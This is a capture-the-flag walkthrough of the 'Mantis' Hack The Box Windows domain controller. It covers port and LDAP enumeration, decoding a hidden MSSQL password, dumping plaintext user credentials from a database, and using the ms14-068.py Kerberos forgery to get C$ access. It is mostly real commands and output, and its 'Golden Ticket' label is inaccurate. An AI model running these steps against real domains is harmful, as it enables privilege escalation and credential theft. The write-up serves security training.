Mantis
Mantis was one of those Windows targets where it’s just a ton of enumeration until you get a System shell. The exploit is where a low level user was allowed to make a privileged Kerberos ticket.
- Nmap
- Recon
- SQL Credential , Get a user james
ms14-068.py
low privelege user to system user impersonate admin priv.
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-23 02:25:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
8080/tcp open http Microsoft IIS httpd 7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s
| ms-sql-info:
| 10.129.167.60:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2021-07-22T22:26:38-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-23T02:26:42z
|_ start_date: 2021-07-23T02:24:20
PORT STATE SERVICE VERSION
1337/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-23T02:24:48
|_Not valid after: 2051-07-23T02:24:48
|_ssl-date: 2021-07-23T02:30:39+00:00; 0s from scanner time.
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49164/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-23T02:24:48
|_Not valid after: 2051-07-23T02:24:48
|_ssl-date: 2021-07-23T02:30:39+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 10.129.167.60:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
We have good number of ports open. Let’s enumerate and gather as much information as possible
Port 53
1
dig @10.129.167.60 -x 10.129.167.60
No PTR records. Let’s skip this for now.
Port 135,139,445 Enumerate rpcinfo data
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jul 23 09:42:29 2021
==========================
| Target Information |
==========================
Target ........... 10.129.167.60
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 10.129.167.60 |
=====================================================
[E] Can;t find workgroup/domain
=============================================
| Nbtstat Information for 10.129.167.60 |
=============================================
Looking up status of 10.129.167.60
No reply from 10.129.167.60
======================================
| Session Check on 10.129.167.60 |
======================================
[+] Server 10.129.167.60 allows sessions using username '', password ''
[+] Got domain/workgroup name:
============================================
| Getting domain SID for 10.129.167.60 |
============================================
Domain Name: HTB
Domain Sid: S-1-5-21-4220043660-4019079961-2895681657
[+] Host is part of a domain (not a workgroup)
=======================================
| OS information on 10.129.167.60 |
=======================================
[+] Got OS info for 10.129.167.60 from smbclient:
[+] Got OS info for 10.129.167.60 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
==============================
| Users on 10.129.167.60 |
==============================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
==========================================
| Share Enumeration on 10.129.167.60 |
==========================================
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.129.167.60
=====================================================
| Password Policy Information for 10.129.167.60 |
=====================================================
[E] Unexpected error from polenum:
[+] Attaching to 10.129.167.60 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.129.167.60)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
===============================
| Groups on 10.129.167.60 |
===============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
========================================================================
| Users on 10.129.167.60 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
==============================================
| Getting printer info for 10.129.167.60 |
==============================================
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Fri Jul 23 09:43:19 2021
1
2
3
4
5
____ $crackmapexec smb 10.129.167.60 -u "" -p "" --shares
SMB 10.129.167.60 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.129.167.60 445 MANTIS [-] htb.local\: STATUS_ACCESS_DENIED
SMB 10.129.167.60 445 MANTIS [-] Error enumerating shares: STATUS_ACCESS_DENIED
Anonymous authentication is disabled. So we need a user to get all the details.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
____ $ldapsearch -h 10.129.167.60 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
We have a domain htb.local. Let’s add it to our /etc/hosts
file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
____ $ldapsearch -h 10.129.167.60 -x -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
#
dn:
currentTime: 20210723041730.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=htb,DC=local
dsServiceName: CN=NTDS Settings,CN=MANTIS,CN=Servers,CN=Default-First-Site-Nam
e,CN=Sites,CN=Configuration,DC=htb,DC=local
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
defaultNamingContext: DC=htb,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=htb,DC=local
configurationNamingContext: CN=Configuration,DC=htb,DC=local
rootDomainNamingContext: DC=htb,DC=local
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
highestCommittedUSN: 127061
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: mantis.htb.local
ldapServiceName: htb.local:mantis$@HTB.LOCAL
serverName: CN=MANTIS,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Config
uration,DC=htb,DC=local
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 4
forestFunctionality: 4
domainControllerFunctionality: 4
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
We have another domain manits.htb.local
let’s save it.
Port 1337
Let’s Bruteforce and see if we have any directories.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
____ $ffuf -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u http://htb.local:1337/FUZZ -e aspx,
asp
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://htb.local:1337/FUZZ
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
:: Extensions : aspx asp
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
aspnet_client [Status: 301, Size: 159, Words: 9, Lines: 2, Duration: 166ms]
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 165ms]
:: Progress: [79752/79752] :: Job [1/1] :: 232 req/sec :: Duration: [0:05:35] :: Errors: 6 ::
We did not find much information. Let’s try to brute with IIS-Shortname search as IIS is vulnerable to Shortname Vulnerability.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
____ $java -jar iis_shortname_scanner.jar 2 20 http://htb.local:1337/
magicFileName: *~1*
requestMethodDelimiter: ,
requestMethod: DEBUG,OPTIONS,GET,POST,HEAD,TRACE
nameStartsWith:
extStartsWith:
hassleFree: true
cookies: IIS_Tilde_Scanner=1;
outputFile: iis_shortname_scanner_logfile.txt
acceptableDifferenceLengthBetweenResponses: 10
proxyServerPort:
magicFinalPartList: \a.aspx,\a.asp,/a.aspx,/a.asp,/a.shtml,/a.asmx,/a.ashx,/a.config,/a.php,/a.jpg,/webresource.axd,/a.xxx
headersDelimiter: @@
saveOutput: false
maxNumericalPart: 3
headers: X-Forwarded-For: 127.0.0.1@@X-Originating-IP: 127.0.0.1@@X-Cluster-Client-Ip: 127.0.0.1
useProvidedURLWithoutChange: false
debug: false
maxConnectionTimeOut: 20000
magicFinalPartDelimiter: ,
forceNumericalPart: 1
userAgent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
inScopeCharacters: ETAONRISHDLFCMUGYPWBVKJXQZ0123456789_-$~()&!#%'@^`{}
asteriskSymbol: *
showActualNames: true
maxRetryTimes: 10
maxDelayAfterEachRequest: 1
magicFileExtension: *
URLSuffix: ?&aspxerrorpath=/
questionMarkSymbol: ?
-- Current Configuration -- Begin
Scan Mode: ALL
Number of threads: 20
Config file: config.xml
Scanner version: 2.3.9 (05 February 2017)
-- Current Configuration -- End
Max delay after each request in milliseconds = 1
No proxy has been used.
Scanning...
Testing request method: "DEBUG" with magic part: "\a.aspx" ...
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by IISShortNameScanner.IIS_ShortName_Scanner (file:/opt/tools/IIS-ShortName-Scanner/iis_shortname_scanner.jar) to field java.net.HttpURLConnection.method
WARNING: Please consider reporting this to the maintainers of IISShortNameScanner.IIS_ShortName_Scanner
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Testing request method: "OPTIONS" with magic part: "\a.aspx" ...
Dir: ASPNET~1
Dir: SECURE~1
[-] SECURU
# IIS Short Name (8.3) Scanner version 2.3.9 (05 February 2017) - scan initiated 2021/07/23 11:55:07
Target: http://htb.local:1337/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): \a.aspx
|_ Extra information:
|_ Number of sent requests: 268
|_ Identified directories: 2
|_ ASPNET~1
|_ SECURE~1
|_ Indentified files: 0
Finished in: 19 second(s)
We have some dirctory starting with SECURE
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
____ $grep -E "\bsecure" /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt > secure.txt
____ $ffuf -w secure.txt -u http://htb.local:1337/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://htb.local:1337/FUZZ
:: Wordlist : FUZZ: secure.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
secure_notes [Status: 301, Size: 158, Words: 9, Lines: 2, Duration: 328ms]
:: Progress: [391/391] :: Job [1/1] :: 227 req/sec :: Duration: [0:00:02] :: Errors: 0 ::
We have a directory name secure_notes
. Let’s access and check
Also if we have close look on the url the it looks like some kind of hash url
1
http://htb.local:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
HASH : NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx
1
2
echo -n "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d
6d2424716c5f53405f504073735730726421
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
___ $hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 6d2424716c5f53405f504073735730726421
Not Found.
--------------------------------------------------
___$ echo -n "6d2424716c5f53405f504073735730726421" | wc -c
36
Invalid hash. Stuck here for a while. Played with the hash for a while and found it is hex representration
1
2
____ $echo -n "6d2424716c5f53405f504073735730726421" | xxd -r -p
m$$ql_S@_P@ssW0rd!
We have a user and a password. Let’s see where we can use these creds
Port 8080
Credentials did not work.
Port 1433
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
____ $impacket-mssqlclient 'admin:m$$ql_S@_P@ssW0rd!'@htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL> select name from master.sys.databases;
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
orcharddb
SQL>
We have orcharddb
let’s dump all the information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
SQL> select table_name from orcharddb.information_schema.tables
table_name
--------------------------------------------------------------------------------------------------------------------------------
blog_Orchard_Blogs_RecentBlogPostsPartRecord
blog_Orchard_Blogs_BlogArchivesPartRecord
blog_Orchard_Workflows_TransitionRecord
blog_Orchard_Workflows_WorkflowRecord
blog_Orchard_Workflows_WorkflowDefinitionRecord
blog_Orchard_Workflows_AwaitingActivityRecord
blog_Orchard_Workflows_ActivityRecord
blog_Orchard_Tags_TagsPartRecord
blog_Orchard_Framework_DataMigrationRecord
blog_Orchard_Tags_TagRecord
blog_Orchard_Tags_ContentTagRecord
blog_Settings_ContentFieldDefinitionRecord
blog_Orchard_Framework_DistributedLockRecord
blog_Settings_ContentPartDefinitionRecord
blog_Settings_ContentPartFieldDefinitionRecord
blog_Settings_ContentTypeDefinitionRecord
blog_Settings_ContentTypePartDefinitionRecord
blog_Settings_ShellDescriptorRecord
blog_Settings_ShellFeatureRecord
blog_Settings_ShellFeatureStateRecord
blog_Settings_ShellParameterRecord
blog_Settings_ShellStateRecord
blog_Orchard_Framework_ContentItemRecord
blog_Orchard_Framework_ContentItemVersionRecord
blog_Orchard_Framework_ContentTypeRecord
blog_Orchard_Framework_CultureRecord
blog_Common_BodyPartRecord
blog_Common_CommonPartRecord
blog_Common_CommonPartVersionRecord
blog_Common_IdentityPartRecord
blog_Containers_ContainerPartRecord
blog_Containers_ContainerWidgetPartRecord
blog_Containers_ContainablePartRecord
blog_Title_TitlePartRecord
blog_Navigation_MenuPartRecord
blog_Navigation_AdminMenuPartRecord
blog_Scheduling_ScheduledTaskRecord
blog_Orchard_ContentPicker_ContentMenuItemPartRecord
blog_Orchard_Alias_AliasRecord
blog_Orchard_Alias_ActionRecord
blog_Orchard_Autoroute_AutoroutePartRecord
blog_Orchard_Users_UserPartRecord
blog_Orchard_Roles_PermissionRecord
blog_Orchard_Roles_RoleRecord
blog_Orchard_Roles_RolesPermissionsRecord
blog_Orchard_Roles_UserRolesPartRecord
blog_Orchard_Packaging_PackagingSource
blog_Orchard_Recipes_RecipeStepResultRecord
blog_Orchard_OutputCache_CacheParameterRecord
blog_Orchard_MediaProcessing_ImageProfilePartRecord
blog_Orchard_MediaProcessing_FilterRecord
blog_Orchard_MediaProcessing_FileNameRecord
blog_Orchard_Widgets_LayerPartRecord
blog_Orchard_Widgets_WidgetPartRecord
blog_Orchard_Comments_CommentPartRecord
blog_Orchard_Comments_CommentsPartRecord
blog_Orchard_Taxonomies_TaxonomyPartRecord
blog_Orchard_Taxonomies_TermPartRecord
blog_Orchard_Taxonomies_TermContentItem
blog_Orchard_Taxonomies_TermsPartRecord
blog_Orchard_MediaLibrary_MediaPartRecord
blog_Orchard_Blogs_BlogPartArchiveRecord
We have a user table blog_Orchard_Users_UserPartRecord
1
2
3
4
5
6
7
8
9
SQL> select username,password from orcharddb.dbo.blog_Orchard_Users_UserPartRecord
username password
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
admin AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
James J@m3s_P@ssW0rd!
One of the user’s credentials are stored in plain text.
User: james
Pass: J@m3s_P@ssW0rd!
Let make a note of user in users.txt and password in passwords.txt
Let’s check if james is a member of domain
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
____ $/opt/tools/kerbrute userenum users.txt --dc htb.local -d htb.local
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/23/21 - Ronnie Flathers @ropnop
2021/07/23 13:40:21 > Using KDC(s):
2021/07/23 13:40:21 > htb.local:88
2021/07/23 13:40:21 > [+] VALID USERNAME: james@htb.local
2021/07/23 13:40:21 > Done! Tested 2 usernames (1 valid) in 0.191 seconds
James user in domain htb.local
1
2
3
4
5
6
7
8
9
10
11
____ $crackmapexec smb htb.local -u users.txt -p passwords.txt --shares
SMB 10.129.167.60 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.129.167.60 445 MANTIS [+] htb.local\james:J@m3s_P@ssW0rd!
SMB 10.129.167.60 445 MANTIS [+] Enumerated shares
SMB 10.129.167.60 445 MANTIS Share Permissions Remark
SMB 10.129.167.60 445 MANTIS ----- ----------- ------
SMB 10.129.167.60 445 MANTIS ADMIN$ Remote Admin
SMB 10.129.167.60 445 MANTIS C$ Default share
SMB 10.129.167.60 445 MANTIS IPC$ Remote IPC
SMB 10.129.167.60 445 MANTIS NETLOGON READ Logon server share
SMB 10.129.167.60 445 MANTIS SYSVOL READ Logon server share
After a lot of enumeration
http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html https://wizard32.net/blog/knock-and-pass-kerberos-exploitation.html
/etc/krb5.conf
needs to have information about the domain. Based on the blog, I’ll set mine to:
1
2
3
4
5
6
7
8
9
10
11
12
[libdefaults]
default_realm = HTB.LOCAL
[realms]
htb.local = {
kdc = mantis.htb.local:88
admin_serve = mantis.htb.local
default_domain = htb.local
}
[domain_realm]
.domain.internal = htb.local
domain.internal = htb.local
I’ll use rdate
to check the remote time and make sure it’s within five minutes of my host’s time.
Generate Kerberos Ticket
First I’ll test this config and try to generate a Kerberos ticket:
1
2
root@kali# kinit james
Password for james@HTB.LOCAL:
klist
will show the ticket:
1
2
3
4
5
6
7
root@kali# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: james@HTB.LOCAL
Valid starting Expires Service principal
08/30/2020 16:44:33 08/31/2020 02:44:33 krbtgt/HTB.LOCAL@HTB.LOCAL
renew until 08/31/2020 16:44:26
I can try to connect to C$
, and it will fail:
1
2
root@kali# smbclient -W htb.local //mantis/c$ -k
tree connect failed: NT_STATUS_ACCESS_DENIED
That makes sense, since this ticket is for james. If I try to connect to SYSVOL
, it works:
1
2
3
root@kali# smbclient -W htb.local //mantis/sysvol -k
Try "help" to get a list of possible commands.
smb: \>
Forge Golden Ticket
First I need the SID for the james user. I’ll get it via rpcclient
:
1
2
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
I was able to find a copy of ms14-068.py
here, and I’ll run it just like the help suggests:
1
2
3
4
5
6
7
8
9
10
11
root@kali# python /opt/pykek/ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local
Password:
[+] Building AS-REQ for mantis.htb.local... Done!
[+] Sending AS-REQ to mantis.htb.local... Done!
[+] Receiving AS-REP from mantis.htb.local... Done!
[+] Parsing AS-REP from mantis.htb.local... Done!
[+] Building TGS-REQ for mantis.htb.local... Done!
[+] Sending TGS-REQ to mantis.htb.local... Done!
[+] Receiving TGS-REP from mantis.htb.local... Done!
[+] Parsing TGS-REP from mantis.htb.local... Done!
[+] Creating ccache file 'TGT_james@htb.local.ccache'... Done!
This creates a file, TGT_james@htb.local.ccache
. I’ll copy this into /tmp
where it is used:
1
root@kali# cp TGT_james@htb.local.ccache /tmp/krb5cc_0
Filesystem Access
Now I have access to the entire filesystem:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@kali# smbclient -W htb.local //mantis/c$ -k
Try "help" to get a list of possible commands.
smb: \> dir
$Recycle.Bin DHS 0 Fri Sep 1 10:19:03 2017
Documents and Settings DHS 0 Tue Jul 14 01:06:44 2009
inetpub D 0 Fri Sep 1 09:41:09 2017
pagefile.sys AHS 2146951168 Wed Sep 2 16:33:23 2020
PerfLogs D 0 Mon Jul 13 23:20:08 2009
Program Files DR 0 Sat Dec 23 22:28:26 2017
Program Files (x86) DR 0 Fri Sep 1 14:28:51 2017
ProgramData DH 0 Fri Sep 1 09:16:24 2017
